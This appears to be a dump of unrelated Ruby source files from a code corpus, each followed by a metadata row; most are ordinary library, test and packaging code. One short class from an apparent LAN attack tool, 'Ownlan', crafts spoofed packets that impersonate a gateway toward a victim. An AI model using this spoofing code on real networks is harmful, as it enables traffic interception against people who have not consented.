</titleInfo>
<name usage="primary" type="corporate" nameTitleGroup="1">
<namePart>United States</namePart>
</name>
XML
end
let(:cocina) do
{
title: [
{
structuredValue: [
{
value: 'United States',
type: 'name'
},
{
value: 'Laws, etc. (United States code service)',
type: 'title'
}
],
type: 'uniform'
}
],
contributor: [
{
name: [
{
value: 'United States'
}
],
type: 'organization',
status: 'primary'
}
]
}
end
end
end
# Data error handling
describe 'Complex multilingual title' do
it_behaves_like 'MODS cocina mapping' do
let(:mods) do
<<~XML
<titleInfo altRepGroup="1">
<title>Sefer Shaʻare ha-ḳedushah in Hebrew</title>
<subTitle>zeh sefer le-yosher ha-adam la-ʻavodat borʼo in Hebrew</subTitle>
</titleInfo>
<titleInfo altRepGroup="1">
<title>Sefer Shaʻare ha-ḳedushah</title>
<subTitle>zeh sefer le-yosher ha-adam la-ʻavodat borʼo</subTitle>
</titleInfo>
<titleInfo type="uniform" nameTitleGroup="1" altRepGroup="2">
<title>Shaʻare ha-ḳedushah</title>
</titleInfo>
<name type="personal" usage="primary" nameTitleGroup="1">
<namePart>Vital, Ḥayyim ben Joseph</namePart>
<namePart type="date">1542 or 1543-1620</namePart>
</name>
XML
end
let(:roundtrip_mods) do
<<~XML
<titleInfo altRepGroup="1">
<title>Sefer Shaʻare ha-ḳedushah in Hebrew</title>
<subTitle>zeh sefer le-yosher ha-adam la-ʻavodat borʼo in Hebrew</subTitle>
</titleInfo>
<titleInfo altRepGroup="1">
<title>Sefer Shaʻare ha-ḳedushah</title>
<subTitle>zeh sefer le-yosher ha-adam la-ʻavodat borʼo</subTitle>
</titleInfo>
<titleInfo type="uniform" nameTitleGroup="1">
<title>Shaʻare ha-ḳedushah</title>
</titleInfo>
<name type="personal" usage="primary" nameTitleGroup="1">
<namePart>Vital, Ḥayyim ben Joseph</namePart>
<namePart type="date">1542 or 1543-1620</namePart>
</name>
XML
end
let(:cocina) do
{
title: [
{
parallelValue: [
{
structuredValue: [
{
value: 'Sefer Shaʻare ha-ḳedushah in Hebrew',
type: 'main title'
},
{
value: 'zeh sefer le-yosher ha-adam la-ʻavodat borʼo in Hebrew',
type: 'subtitle'
}
]
},
{
structuredValue: [
{
value: 'Sefer Shaʻare ha-ḳedushah',
type: 'main title'
},
{
value: 'zeh sefer le-yosher ha-adam la-ʻavodat borʼo',
type: 'subtitle'
}
]
}
]
},
{
structuredValue: [
{
value: 'Shaʻare ha-ḳedushah',
type: 'title'
},
{
structuredValue: [
{
value: 'Vital, Ḥayyim ben Joseph',
type: 'name'
},
{
value: '1542 or 1543-1620',
type: 'life dates'
}
],
type: 'name'
}
],
type: 'uniform'
}
],
contributor: [
{
name: [
{
structuredValue: [
{
value: 'Vital, Ḥayyim ben Joseph',
type: 'name'
},
{
value: '1542 or 1543-1620',
type: 'life dates'
}
]
}
],
type: 'person',
status: 'primary'
}
]
}
end
end
end
describe 'Multiple titles with primary' do
it_behaves_like 'MODS cocina mapping' do
let(:mods) do
<<~XML
<titleInfo usage="primary">
<title>Title 1</title>
</titleInfo>
<titleInfo usage="primary">
<title>Title 2</title>
</titleInfo>
XML
end
let(:roundtrip_mods) do
# Drop all instances of usage="primary" after first one
<<~XML
<titleInfo usage="primary">
<title>Title 1</title>
</titleInfo>
<titleInfo>
<title>Title 2</title>
</titleInfo>
XML
end
let(:cocina) do
{
title: [
{
value: 'Title 1',
status: 'primary'
},
{
value: 'Title 2'
}
]
}
end
let(:warnings) do
[
Notification.new(msg: 'Multiple marked as primary', context: { type: 'title' })
]
end
end
end
end
| 28.527149 | 166 | 0.399662 |
39e32103122e0e31192e8052c8a602c84d7476ea | 3,372 | require 'fastlane_core/ui/ui'
module Fastlane
UI = FastlaneCore::UI unless Fastlane.const_defined?("UI")
module Helper
class InstallProvisioningProfileHelper
def self.show_message
UI.message("Hello from the install_provisioning_profile plugin helper!")
end
def self.install_profile_from_path(path)
Helper::InstallProvisioningProfileHelper.ensure_profiles_dir_created()
Helper::InstallProvisioningProfileHelper.install_profile(path)
end
def self.install_profiles_from_list(profiles_list)
filtered_profiles = profiles_list.select do |profile_path|
profile_extension = File.extname(profile_path)
profile_extension == PROFILE_EXTENSION
end
raise "There are no #{PROFILE_EXTENSION} files in list #{profiles_list}" if filtered_profiles.count == 0
Helper::InstallProvisioningProfileHelper.ensure_profiles_dir_created()
filtered_profiles.each { |profile_path|
Helper::InstallProvisioningProfileHelper.install_profile(profile_path)
}
end
def self.install_profiles_from_dir(profiles_dir)
filtered_profiles = Dir.entries(profiles_dir).select do |profile_path|
profile_extension = File.extname(profile_path)
profile_extension == PROFILE_EXTENSION
end
raise "There are no #{PROFILE_EXTENSION} files in directory #{profiles_dir}" if filtered_profiles.count == 0
Helper::InstallProvisioningProfileHelper.ensure_profiles_dir_created()
filtered_profiles.each { |profile_path|
Helper::InstallProvisioningProfileHelper.install_profile(File.join(profiles_dir, profile_path))
}
end
private
PROFILE_EXTENSION = '.mobileprovision'
DEFAULT_PROFILES_PATH = '~/Library/MobileDevice/Provisioning Profiles'
def self.ensure_profiles_dir_created()
dest_profiles_dir = File.expand_path(DEFAULT_PROFILES_PATH)
FileUtils.mkdir_p(dest_profiles_dir)
end
def self.install_profile(profile_path)
profile_file_name = File.basename(profile_path)
profile_extension = File.extname(profile_path)
raise "Incorrect file name #{profile_path}" if profile_file_name.nil?
raise "Incorrect file extension for #{profile_path}. Must be mobileprovision" if profile_extension != PROFILE_EXTENSION
require 'tmpdir'
Dir.mktmpdir('fastlane') do |dir|
err = "#{dir}/grep.err"
profile_uuid = `grep -aA1 UUID "#{profile_path}" | grep -io "[a-z0-9]\\{8\\}-[a-z0-9]\\{4\\}-[a-z0-9]\\{4\\}-[a-z0-9]\\{4\\}-[a-z0-9]\\{12\\}" 2> #{err}`
raise RuntimeError, "UUID parsing failed #{profile_path}. Exit: #{$?.exitstatus}: #{File.read(err)}" if $?.exitstatus != 0
profile_uuid = profile_uuid.strip
raise RuntimeError, "UUID is empty for file #{profile_path}" if (profile_uuid.nil? || profile_uuid.empty?)
dest_profiles_dir = File.expand_path(DEFAULT_PROFILES_PATH)
dest_profile_path = File.join(dest_profiles_dir, "#{profile_uuid}#{PROFILE_EXTENSION}")
UI.message("install_provisioning_profile: installing profile: #{profile_path} dest_profile_path: #{dest_profile_path} profile_uuid: #{profile_uuid}")
FileUtils.install(profile_path, dest_profile_path)
end
end
end
end
end
| 40.142857 | 163 | 0.700474 |
bfe3c7634c1c05eec6892766aa1e915911bcfb2a | 1,163 | # frozen_string_literal: true
require 'common/client/concerns/service_status'
require 'common/models/base'
require 'ihub/models/appointment'
module IHub
module Appointments
class Response < Common::Base
include Common::Client::Concerns::ServiceStatus
attribute :status, Integer
attribute :appointments, Array
def initialize(attributes = nil)
super(attributes) if attributes
self.status = attributes[:status]
end
def self.from(response)
all_appointments = response.body&.fetch('data', [])
new(
status: response.status,
appointments: IHub::Models::Appointment.build_all(all_appointments)
)
end
def ok?
status == 200
end
def cache?
ok?
end
def metadata
{ status: response_status }
end
def response_status
case status
when 200
RESPONSE_STATUS[:ok]
when 403
RESPONSE_STATUS[:not_authorized]
when 404
RESPONSE_STATUS[:not_found]
else
RESPONSE_STATUS[:server_error]
end
end
end
end
end
| 20.767857 | 77 | 0.60877 |
38a06617f19656852ac5905f09cbbf154bb9bd3c | 838 | #update forum information
require "rubygems"
require "rest_client"
require "json"
# Need to specify category_id,forum_id in url
# eg:
# site = RestClient::Resource.new("http://domain.freshdesk.com/categories/4/forums/11.json","[email protected]","test")
site = RestClient::Resource.new("http://domain.freshdesk.com/categories/[category_id]/forums/[forum_id].json","[email protected]","test")
#Forum type: 1-Questions,2-Ideas,3-Problems,4-Announcements
#Forum_visibility: 1-All,2-Logged in users,3-Agents, 4- selected companies[need to provide customer_ids for this option]
response=site.put({:forum=>{:name=>"test",:description=>"test description",:forum_type=>3,:forum_visibility=>2,:customer_forums_attributes=>{:customer_id=>[1,2]}}},:content_type=>"application/json")
puts "response: #{response.code} \n #{response.body}" | 46.555556 | 198 | 0.757757 |
91df74a2de6e0793c4671c782adb620ce3db398d | 488 | module Ownlan
module Attack
class Client < Base
def process
generate_packet
send_packet
end
def generate_packet(target_ip = nil)
gw_ip = ServiceObjects::NetworkInformation.gateway_ip
saddr = config.source_mac
daddr = config.victim_mac || victim_mac
saddr_ip = gw_ip
daddr_ip = victim_ip
@crafted_packet = packet_craft(saddr, daddr, saddr_ip, daddr_ip).call
end
end
end
end
| 19.52 | 77 | 0.625 |
ac81831d11919eaaa66c08e6b957b6125e27f45e | 116 | define :openldap_client, :mothra => "a big monster" do
cat "#{params[:name]}" do
pretty_kitty true
end
end
| 19.333333 | 54 | 0.663793 |
1c766c4e839256c2f4c098ba22da03d5523a5dcc | 10,391 | # Copyright 2018 Google Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ----------------------------------------------------------------------------
#
# *** AUTO GENERATED CODE *** AUTO GENERATED CODE ***
#
# ----------------------------------------------------------------------------
#
# This file is automatically generated by Magic Modules and manual
# changes will be clobbered when the file is regenerated.
#
# Please read more about how to change this file in README.md and
# CONTRIBUTING.md located at the root of this package.
#
# ----------------------------------------------------------------------------
require 'google/compute/network/delete'
require 'google/compute/network/get'
require 'google/compute/network/post'
require 'google/compute/network/put'
require 'google/compute/property/address_address_type'
require 'google/compute/property/enum'
require 'google/compute/property/integer'
require 'google/compute/property/region_name'
require 'google/compute/property/string'
require 'google/compute/property/string_array'
require 'google/compute/property/subnetwork_selflink'
require 'google/compute/property/time'
require 'google/hash_utils'
require 'google/object_store'
require 'puppet'
Puppet::Type.type(:gcompute_address).provide(:google) do
mk_resource_methods
def self.instances
debug('instances')
raise [
'"puppet resource" is not supported at the moment:',
'TODO(nelsonjr): https://goto.google.com/graphite-bugs-view?id=167'
].join(' ')
end
def self.prefetch(resources)
debug('prefetch')
resources.each do |name, resource|
project = resource[:project]
debug("prefetch #{name}") if project.nil?
debug("prefetch #{name} @ #{project}") unless project.nil?
fetch = fetch_resource(resource, self_link(resource), 'compute#address')
resource.provider = present(name, fetch) unless fetch.nil?
Google::ObjectStore.instance.add(:gcompute_address, resource)
end
end
def self.present(name, fetch)
result = new({ title: name, ensure: :present }.merge(fetch_to_hash(fetch)))
result.instance_variable_set(:@fetched, fetch)
result
end
def self.fetch_to_hash(fetch)
{
address: Google::Compute::Property::String.api_munge(fetch['address']),
address_type: Google::Compute::Property::AddressTypeEnum.api_munge(fetch['addressType']),
creation_timestamp: Google::Compute::Property::Time.api_munge(fetch['creationTimestamp']),
description: Google::Compute::Property::String.api_munge(fetch['description']),
id: Google::Compute::Property::Integer.api_munge(fetch['id']),
name: Google::Compute::Property::String.api_munge(fetch['name']),
network_tier: Google::Compute::Property::Enum.api_munge(fetch['networkTier']),
subnetwork: Google::Compute::Property::SubnetworkSelfLinkRef.api_munge(fetch['subnetwork']),
users: Google::Compute::Property::StringArray.api_munge(fetch['users'])
}.reject { |_, v| v.nil? }
end
def exists?
debug("exists? #{@property_hash[:ensure] == :present}")
@property_hash[:ensure] == :present
end
def create
debug('create')
@created = true
create_req = Google::Compute::Network::Post.new(collection(@resource),
fetch_auth(@resource),
'application/json',
resource_to_request)
@fetched = wait_for_operation create_req.send, @resource
@property_hash[:ensure] = :present
end
def destroy
debug('destroy')
@deleted = true
delete_req = Google::Compute::Network::Delete.new(self_link(@resource),
fetch_auth(@resource))
wait_for_operation delete_req.send, @resource
@property_hash[:ensure] = :absent
end
def flush
debug('flush')
# return on !@dirty is for aiding testing (puppet already guarantees that)
return if @created || @deleted || !@dirty
raise 'Address cannot be edited.'
end
def dirty(field, from, to)
@dirty = {} if @dirty.nil?
@dirty[field] = {
from: from,
to: to
}
end
def exports
{
address: @fetched['address'],
self_link: @fetched['selfLink']
}
end
private
def self.resource_to_hash(resource)
{
project: resource[:project],
name: resource[:name],
kind: 'compute#address',
address: resource[:address],
address_type: resource[:address_type],
creation_timestamp: resource[:creation_timestamp],
description: resource[:description],
id: resource[:id],
network_tier: resource[:network_tier],
subnetwork: resource[:subnetwork],
users: resource[:users],
region: resource[:region]
}.reject { |_, v| v.nil? }
end
def resource_to_request
request = {
kind: 'compute#address',
address: @resource[:address],
addressType: @resource[:address_type],
description: @resource[:description],
name: @resource[:name],
networkTier: @resource[:network_tier],
subnetwork: @resource[:subnetwork]
}.reject { |_, v| v.nil? }
debug "request: #{request}" unless ENV['PUPPET_HTTP_DEBUG'].nil?
request.to_json
end
def fetch_auth(resource)
self.class.fetch_auth(resource)
end
def self.fetch_auth(resource)
Puppet::Type.type(:gauth_credential).fetch(resource)
end
def debug(message)
puts("DEBUG: #{message}") if ENV['PUPPET_HTTP_VERBOSE']
super(message)
end
def self.collection(data)
URI.join(
'https://www.googleapis.com/compute/v1/',
expand_variables(
'projects/{{project}}/regions/{{region}}/addresses',
data
)
)
end
def collection(data)
self.class.collection(data)
end
def self.self_link(data)
URI.join(
'https://www.googleapis.com/compute/v1/',
expand_variables(
'projects/{{project}}/regions/{{region}}/addresses/{{name}}',
data
)
)
end
def self_link(data)
self.class.self_link(data)
end
# rubocop:disable Metrics/CyclomaticComplexity
def self.return_if_object(response, kind, allow_not_found = false)
raise "Bad response: #{response.body}" \
if response.is_a?(Net::HTTPBadRequest)
raise "Bad response: #{response}" \
unless response.is_a?(Net::HTTPResponse)
return if response.is_a?(Net::HTTPNotFound) && allow_not_found
return if response.is_a?(Net::HTTPNoContent)
result = JSON.parse(response.body)
raise_if_errors result, %w[error errors], 'message'
raise "Bad response: #{response}" unless response.is_a?(Net::HTTPOK)
result
end
# rubocop:enable Metrics/CyclomaticComplexity
def return_if_object(response, kind, allow_not_found = false)
self.class.return_if_object(response, kind, allow_not_found)
end
def self.extract_variables(template)
template.scan(/{{[^}]*}}/).map { |v| v.gsub(/{{([^}]*)}}/, '\1') }
.map(&:to_sym)
end
def self.expand_variables(template, var_data, extra_data = {})
data = if var_data.class <= Hash
var_data.merge(extra_data)
else
resource_to_hash(var_data).merge(extra_data)
end
extract_variables(template).each do |v|
unless data.key?(v)
raise "Missing variable :#{v} in #{data} on #{caller.join("\n")}}"
end
template.gsub!(/{{#{v}}}/, CGI.escape(data[v].to_s))
end
template
end
def expand_variables(template, var_data, extra_data = {})
self.class.expand_variables(template, var_data, extra_data)
end
def fetch_resource(resource, self_link, kind)
self.class.fetch_resource(resource, self_link, kind)
end
def async_op_url(data, extra_data = {})
URI.join(
'https://www.googleapis.com/compute/v1/',
expand_variables(
'projects/{{project}}/regions/{{region}}/operations/{{op_id}}',
data, extra_data
)
)
end
def wait_for_operation(response, resource)
op_result = return_if_object(response, 'compute#operation')
return if op_result.nil?
status = ::Google::HashUtils.navigate(op_result, %w[status])
fetch_resource(
resource,
URI.parse(::Google::HashUtils.navigate(wait_for_completion(status,
op_result,
resource),
%w[targetLink])),
'compute#address'
)
end
def wait_for_completion(status, op_result, resource)
op_id = ::Google::HashUtils.navigate(op_result, %w[name])
op_uri = async_op_url(resource, op_id: op_id)
while status != 'DONE'
debug("Waiting for completion of operation #{op_id}")
raise_if_errors op_result, %w[error errors], 'message'
sleep 1.0
raise "Invalid result '#{status}' on gcompute_address." \
unless %w[PENDING RUNNING DONE].include?(status)
op_result = fetch_resource(resource, op_uri, 'compute#operation')
status = ::Google::HashUtils.navigate(op_result, %w[status])
end
op_result
end
def raise_if_errors(response, err_path, msg_field)
self.class.raise_if_errors(response, err_path, msg_field)
end
def self.fetch_resource(resource, self_link, kind)
get_request = ::Google::Compute::Network::Get.new(
self_link, fetch_auth(resource)
)
return_if_object get_request.send, kind, true
end
def self.raise_if_errors(response, err_path, msg_field)
errors = ::Google::HashUtils.navigate(response, err_path)
raise_error(errors, msg_field) unless errors.nil?
end
def self.raise_error(errors, msg_field)
raise IOError, ['Operation failed:',
errors.map { |e| e[msg_field] }.join(', ')].join(' ')
end
end
| 32.987302 | 98 | 0.640458 |
080ac62df2363f307d63a6ab9497ffe3c878a23d | 6,825 | #!/usr/bin/env oo-ruby
#--
# Copyright 2013 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#++
#
# Test the OpenShift frontend_proxy model
#
module OpenShift; end
require 'openshift-origin-node/model/frontend_proxy'
require 'test/unit'
require 'fileutils'
require 'mocha'
# Run unit test manually
# ruby -I node/lib:common/lib node/test/unit/frontend_proxy_test.rb
class TestFrontendProxy < Test::Unit::TestCase
def setup
config = mock('OpenShift::Config')
@ports_begin = 35531
@ports_per_user = 5
@uid_begin = 500
config.stubs(:get).with("PORT_BEGIN").returns(@ports_begin.to_s)
config.stubs(:get).with("PORTS_PER_USER").returns(@ports_per_user.to_s)
config.stubs(:get).with("UID_BEGIN").returns(@uid_begin.to_s)
OpenShift::Config.stubs(:new).returns(config)
end
# Simple test to validate the port range computation given
# a certain UID.
def test_port_range
proxy = OpenShift::FrontendProxyServer.new
range = proxy.port_range(500)
assert_equal range.begin, @ports_begin
assert_equal range.end, (@ports_begin + @ports_per_user)
end
# Verify a valid mapping request is mapped to a port.
def test_valid_add
proxy = OpenShift::FrontendProxyServer.new
uid = 500
proxy.expects(:system_proxy_show).returns(nil).once
proxy.expects(:system_proxy_set).returns(['', '', 0]).once
mapped_port = proxy.add(uid, '127.0.0.1', 8080)
assert_equal 35531, mapped_port
end
# When adding the same mapping twice, the existing port mapping
# should be returned immediately.
def test_valid_add_twice
proxy = OpenShift::FrontendProxyServer.new
uid = 500
proxy.expects(:system_proxy_show).returns(nil).once
proxy.expects(:system_proxy_set).returns(['', '', 0]).once
mapped_port = proxy.add(uid, '127.0.0.1', 8080)
assert_equal 35531, mapped_port
proxy.expects(:system_proxy_show).returns("127.0.0.1:8080").once
mapped_port = proxy.add(uid, '127.0.0.1', 8080)
assert_equal 35531, mapped_port
end
# Ensures that a non-zero return code from a system proxy set
# attempt during an add operation raises an exception.
def test_add_system_error
proxy = OpenShift::FrontendProxyServer.new
uid = 500
proxy.expects(:system_proxy_show).returns(nil).once
proxy.expects(:system_proxy_set).returns(['Stdout', 'Stderr', 1]).once
assert_raises OpenShift::FrontendProxyServerException do
proxy.add(uid, '127.0.0.1', 8080)
end
end
# Verifies that an exception is thrown if all ports in the given
# UID's range are already mapped to an address.
def test_out_of_ports_during_add
proxy = OpenShift::FrontendProxyServer.new
uid = 500
proxy.expects(:system_proxy_show).returns("127.0.0.1:9000").times(@ports_per_user)
proxy.expects(:system_proxy_set).never
assert_raises OpenShift::FrontendProxyServerException do
proxy.add(uid, '127.0.0.1', 8080)
end
end
# Verifies that a successful system proxy delete is executed for
# an existing mapping.
def test_delete_success
proxy = OpenShift::FrontendProxyServer.new
uid = 500
proxy.expects(:system_proxy_show).with(35531).returns("127.0.0.1:8080").once
proxy.expects(:system_proxy_delete).with(35531).returns(['', '', 0]).once
proxy.delete(uid, "127.0.0.1", 8080)
end
# Ensures that no system proxy delete is attempted when no mapping
# to the requested address is found.
def test_delete_nonexistent
proxy = OpenShift::FrontendProxyServer.new
uid = 500
proxy.expects(:system_proxy_show).returns(nil).at_least_once
proxy.expects(:system_proxy_delete).never
proxy.delete(uid, "127.0.0.1", 8080)
end
# Verifies an exception is raised when a valid delete attempt to the
# system proxy returns a non-zero exit code.
def test_delete_failure
proxy = OpenShift::FrontendProxyServer.new
uid = 500
proxy.expects(:system_proxy_show).with(35531).returns("127.0.0.1:8080").once
proxy.expects(:system_proxy_delete).with(35531).returns(['Stdout', 'Stderr', 1]).once
assert_raises OpenShift::FrontendProxyServerException do
proxy.delete(uid, "127.0.0.1", 8080)
end
end
# Tests that a successful delete of all proxy mappings for the UID
# results in a batch of 5 ports being sent to the system proxy command.
def test_delete_all_success
proxy = OpenShift::FrontendProxyServer.new
uid = 500
proxy.expects(:system_proxy_delete).with(anything, anything, anything, anything, anything).returns(['', '', 0]).once
proxy.delete_all_for_uid(uid, false)
end
# Ensures that a non-zero response from the system proxy delete call
# and the ignore errors flag disables results in an exception bubbling.
def test_delete_all_ignore
proxy = OpenShift::FrontendProxyServer.new
uid = 500
proxy.expects(:system_proxy_delete).with(anything, anything, anything, anything, anything).returns(['Stdout', 'Stderr', 1]).once
assert_raises OpenShift::FrontendProxyServerException do
proxy.delete_all_for_uid(uid, false)
end
end
# Verify the command line constructed by the system proxy delete
# given a variety of arguments.
def test_system_proxy_delete
proxy = OpenShift::FrontendProxyServer.new
proxy.expects(:shellCmd).with(equals("openshift-port-proxy-cfg setproxy 1 delete")).once
proxy.system_proxy_delete(1)
proxy.expects(:shellCmd).with(equals("openshift-port-proxy-cfg setproxy 1 delete 2 delete 3 delete")).once
proxy.system_proxy_delete(1, 2, 3)
end
# Verify the command line constructed by the system proxy add command
# given a variety of arguments.
def test_system_proxy_add
proxy = OpenShift::FrontendProxyServer.new
proxy.expects(:shellCmd).with(equals('openshift-port-proxy-cfg setproxy 3000 "127.0.0.1:1000"')).once
proxy.system_proxy_set({:proxy_port => 3000, :addr => '127.0.0.1:1000'})
proxy.expects(:shellCmd)
.with(equals('openshift-port-proxy-cfg setproxy 3000 "127.0.0.1:1000" 3001 "127.0.0.1:1001" 3002 "127.0.0.1:1002"'))
.once
proxy.system_proxy_set(
{:proxy_port => 3000, :addr => '127.0.0.1:1000'},
{:proxy_port => 3001, :addr => '127.0.0.1:1001'},
{:proxy_port => 3002, :addr => '127.0.0.1:1002'}
)
end
end
| 31.597222 | 132 | 0.717509 |
f7b53b722b4380b7e1803be4622ff85a73346ccb | 80 | module Merb
module StaticPagesHelper
end # StaticPagesHelper
end # Merb | 16 | 26 | 0.75 |
87ae9ca7d274980fb0fc3d5818fcb22b72c229f1 | 3,458 | #
# Copyright (c) 2015 - 2018 Luke Hackett
#
# MIT License
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
require 'uri'
module Helpers
# Returns a new instance of the TflApi::Client class using authorised details.
# All calls to the API using this object should return the expected data.
#
# @return [TflApi::Client] A TflApi::Client instance created with valid credentials
#
def authorised_client
# Fail early if the Application private and public keys are not set
fail 'Please set your app id via the TFL_APP_ID environment variable' unless ENV['TFL_APP_ID']
fail 'Please set your app key via the TFL_APP_KEY environment variable' unless ENV['TFL_APP_KEY']
TflApi::Client.new(app_id: ENV['TFL_APP_ID'], app_key: ENV['TFL_APP_KEY'], log_location: '/dev/null')
end
# Returns a new instance of the TflApi::Client class using unauthorised details.
# All calls to the API using this object should result in unauthorised access
# errors from the TFL API.
#
# @return [TflApi::Client] A TflApi::Client instance created with invalid credentials
#
def unauthorised_client
TflApi::Client.new(app_id: 123, app_key: 456, log_location: '/dev/null')
end
# Returns a new instance of the TflApi::Client class using test details.
# This client should only be used within Unit Tests, as the host has been
# fixed to a dummy value.
#
# @return [TflApi::Client] A TflApi::Client instance created with invalid credentials
#
def test_client
TflApi::Client.new(app_id: 12345, app_key: 6789, host: 'https://somehost', log_location: '/dev/null')
end
# Performs a HTTP stubbed request for the given method upon the given resource.
# Optional params can be given to be appended to the URL, whilst the to_return
# allows for specific return information to be set.
#
# @param method [Symbol] The type of stub request, e.g. :get, :post etc
# @param resource [String] The resource path to stub
# @param to_return [Hash] Response to return upon issuing the request
#
# @option params [Hash] A hash of URL params to add to the URI
#
# @return [WebMock::RequestStub] A WebMock::RequestStub instance
#
def stub_api_request(method, resource, params={}, to_return)
params_string = URI.encode_www_form(params)
uri = URI.parse("https://somehost/#{resource}?#{params_string}&app_id=12345&app_key=6789")
stub_request(method.to_sym, uri).to_return(to_return)
end
end | 42.691358 | 105 | 0.744361 |
280d295e26046ba675d05dd83e63989f609f8cd4 | 113 | module AthenaHealth
class PatientCollection < BaseCollection
attribute :patients, Array[Patient]
end
end
| 18.833333 | 42 | 0.787611 |
7a2c9ed5e8bca277864d8f57f8e227d0a33c85e0 | 3,378 | module Api
module V3
module CountriesComTradeIndicators
class ComTradeRequest
class ComTradeError < StandardError; end
RG_TO_ACTIVITY = {
1 => 'importer',
2 => 'exporter'
}
def initialize(uri)
@uri = URI(uri)
end
def call
response = Net::HTTP.get_response(@uri)
if response.code != '200'
error = ComTradeError.new(response)
Rails.logger.error error
Appsignal.send_error(error)
return
end
body = response.body
data = JSON.parse(body)
ensure_valid_response(data['validation']) or return
data['dataset'].each do |element|
attributes = parse_attributes(element)
next unless attributes
Api::V3::CountriesComTradeIndicator.create!(
attributes.merge(updated_at: Time.now)
)
end
end
private
def ensure_valid_response(validation)
status = validation['status']
if status['name'] != 'Ok'
error = ComTradeError.new(
validation['message'] + ' (' +
status['name'] + ' ' +
status['description'] + ')'
)
Rails.logger.error error
Appsignal.send_error(error)
return false
end
true
end
def parse_attributes(element)
commodity_code = element['cmdCode']
commodity = commodity_codes.lookup_by_com_trade_code(commodity_code)
unless commodity
error = ComTradeError.new(
"Unknown commodity #{commodity_code}" +
element.inspect
)
Rails.logger.error error
Appsignal.send_error(error)
return nil
end
iso3 = element['rt3ISO']
return nil if iso3.blank? # ignore, e.g. country groupings
country = country_codes.lookup_by_iso3(iso3)
unless country
error = ComTradeError.new(
"Unknown country #{iso3}" +
element.inspect
)
Rails.logger.error error
Appsignal.send_error(error)
return nil
end
raw_quantity = element['TradeQuantity']
eq_factor = commodity[:eq_factor] || 1
quantity = raw_quantity && raw_quantity * eq_factor
activity = RG_TO_ACTIVITY[element['rgCode']]
return nil if activity.nil? # ignore, e.g. re-export / re-import
{
raw_quantity: raw_quantity,
quantity: quantity,
value: element['TradeValue'],
commodity_id: commodity[:trase_id],
year: element['yr'],
iso3: iso3,
iso2: country[:iso2],
commodity_code: commodity_code,
activity: activity
}
end
def commodity_codes
return @commodity_codes if defined? @commodity_codes
@commodity_codes =
Api::V3::CountriesComTradeIndicators::CommodityCodes.new
end
def country_codes
return @country_codes if defined? @country_codes
@country_codes =
Api::V3::CountriesComTradeIndicators::CountryCodes.new
end
end
end
end
end
| 28.627119 | 78 | 0.541741 |
91825fc124a350d4ad40ce25d37a0ea1af2022cf | 16,867 | class PhpAT56 < Formula
desc "General-purpose scripting language"
homepage "https://secure.php.net/"
url "https://php.net/get/php-5.6.38.tar.xz/from/this/mirror"
sha256 "c2fac47dc6316bd230f0ea91d8a5498af122fb6a3eb43f796c9ea5f59b04aa1e"
revision 2
bottle do
sha256 "a4d5ae99450c84af82dd65248d78981f34251f0759189f0adf1b3d2b76757b08" => :mojave
sha256 "dd5ada4d0c391a3b4136b67f3b2349cf920e6f49c41d898dfe257bf459a9972e" => :high_sierra
sha256 "4c72e8efc0cd575d30c8675c4641677eb3466db3acb14dc28a4ac4c7ad40de6b" => :sierra
end
keg_only :versioned_formula
depends_on "httpd" => [:build, :test]
depends_on "pkg-config" => :build
depends_on "apr"
depends_on "apr-util"
depends_on "aspell"
depends_on "autoconf"
depends_on "curl-openssl"
depends_on "freetds"
depends_on "freetype"
depends_on "gettext"
depends_on "glib"
depends_on "gmp"
depends_on "icu4c"
depends_on "jpeg"
depends_on "libpng"
depends_on "libpq"
depends_on "libtool"
depends_on "libzip"
depends_on "mcrypt"
depends_on "openldap"
depends_on "openssl"
depends_on "pcre"
depends_on "sqlite"
depends_on "tidy-html5"
depends_on "unixodbc"
# PHP build system incorrectly links system libraries
# see https://github.com/php/php-src/pull/3472
patch :DATA
needs :cxx11
def install
# Ensure that libxml2 will be detected correctly in older MacOS
if MacOS.version == :el_capitan || MacOS.version == :sierra
ENV["SDKROOT"] = MacOS.sdk_path
end
# buildconf required due to system library linking bug patch
system "./buildconf", "--force"
inreplace "configure" do |s|
s.gsub! "APACHE_THREADED_MPM=`$APXS_HTTPD -V | grep 'threaded:.*yes'`",
"APACHE_THREADED_MPM="
s.gsub! "APXS_LIBEXECDIR='$(INSTALL_ROOT)'`$APXS -q LIBEXECDIR`",
"APXS_LIBEXECDIR='$(INSTALL_ROOT)#{lib}/httpd/modules'"
s.gsub! "-z `$APXS -q SYSCONFDIR`",
"-z ''"
# apxs will interpolate the @ in the versioned prefix: https://bz.apache.org/bugzilla/show_bug.cgi?id=61944
s.gsub! "LIBEXECDIR='$APXS_LIBEXECDIR'",
"LIBEXECDIR='" + "#{lib}/httpd/modules".gsub("@", "\\@") + "'"
end
# Update error message in apache sapi to better explain the requirements
